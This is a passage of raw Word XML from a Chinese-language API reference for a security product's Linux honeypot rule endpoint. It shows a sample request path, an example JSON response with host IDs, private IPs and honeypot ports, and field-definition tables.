          <w:p w14:paraId="07D08A7F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="665DEC39" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是否必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3C3C287D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="5AC3D67E" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="32AD4F35" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3DC473E7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="349F41FB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5CB30496" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="26087E1C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EDAC5F3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>/external/api/detect/honeypot/linux/rule/70db8ef89e9ae79a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19E8C396" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11A40FD6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "agentId": "70db8ef89e9ae79a",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "displayIp": "172.16.159.1",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "connectionIp": "172.16.2.231",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "externalIp": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "internalIp": "172.16.159.1",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "bizGroupId": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "bizGroup": "未分组主机（Linux）",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "remark": "安装了mysql或者DNSmasq",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "hostTagList": [],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "hostname": "hostname",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "status": 0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "verifyStatus": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "ports": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "port": 1112,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "status": 2</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        },</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "port": 80,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "status": 2</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        },</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "port": 8000,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "status": 2</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        },</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "port": 8080,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "status": 2</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    ]</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E003D03"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452"/>
        <w:gridCol w:w="896"/>
        <w:gridCol w:w="1545"/>
        <w:gridCol w:w="3451"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="1479DAD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A3185BD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="68E481D8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="215621AC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="00569409" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="4A286F8D" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="21CE0F9A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>agentId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="79395B71" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="287601ED" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(16)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5234AEF3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机ID，16位</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="7C9430F7" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0C4C54CF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>displayIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="675E41D8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2610E199" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="70AB7429" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="199CFCDA" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5C277F78" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>connectionIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="725215A7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5215998F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="21B0E063" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>连接IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6A52BF89" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="369CE43A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>externalIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3BEC6547" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="76F63752" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5EB53F85" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>外网IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6B6CDFA9" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="038ACC08" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>internalIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7EC1F989" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="728F0A88" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7493F6B8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>内网IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="21A47265" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4ACD491C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>bizGroupId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="407A949C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="39A3EB8E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>bigint(20)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="609079FB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>业务组ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="3DF3757A" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3CC548DC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>bizGroup</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7788F44A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5C10A8F3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="062E6C0A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>业务组名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="284E98FA" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3FEEABDA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>remark</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="42439E91" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3726E862" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6AADCAEB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>备注</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="589FFED7" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6A4F6F1B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>hostTagList</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0466592C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="657791D9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="372319C2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>标签</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0B540915" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0D00765E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>hostname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="65C9BC14" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0741337F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(512)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6B6135A6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="3FA0F619" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="31ED3422" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="73F5DD75" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3A3DBAEE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>tinyint(1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6D3905D0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>规则状态，0:规则启用 1:规则禁用</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="71F25285" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1D0DE88A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>verifyStatus</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="399EA63D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="165C3D2B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>tinyint(1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6BA34747" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>同步状态，0:规则同步中 1:同步完毕</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="150A3C3F" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7854AF86" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>ports</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="63DEA795" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6FCFDB5D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>见详细</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="141F6FA1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>规则端口</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="44B5FEAC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Port数据结构：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="788"/>
        <w:gridCol w:w="896"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="5403"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="16D1B23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4F7F8C2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="080EF004" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="401A6C25" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="50B3A51A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="2FF29028" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="05AF6ED5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>port</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="363B9C59" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
